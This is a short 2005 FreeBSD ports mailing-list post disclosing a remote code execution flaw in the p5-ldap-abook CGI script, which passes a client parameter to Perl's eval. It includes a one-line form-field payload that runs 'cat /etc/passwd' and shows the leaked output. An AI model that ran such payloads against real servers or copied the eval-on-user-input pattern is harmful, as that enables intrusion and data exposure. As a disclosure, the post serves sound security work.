FreeBSD Port: p5-ldap-abook-1.00

Roman Mashirov mrj at
Fri Nov 18 01:49:59 PST 2005


This cgi script contains remote code exec. In the following code (line 128):
my $attr = eval $query->param(entry);
script directly evaluates cgi paramter, received form client, so <input 
type=hidden name=entry value="system 'cat /etc/passwd';"> leads to the 
following output from script:

# $FreeBSD: src/etc/master.passwd,v 1.39 2004/08/01 21:33:47 markm Exp $ 
# root:*:0:0:Charlie &:/root:/bin/csh

and so on


More information about the freebsd-ports mailing list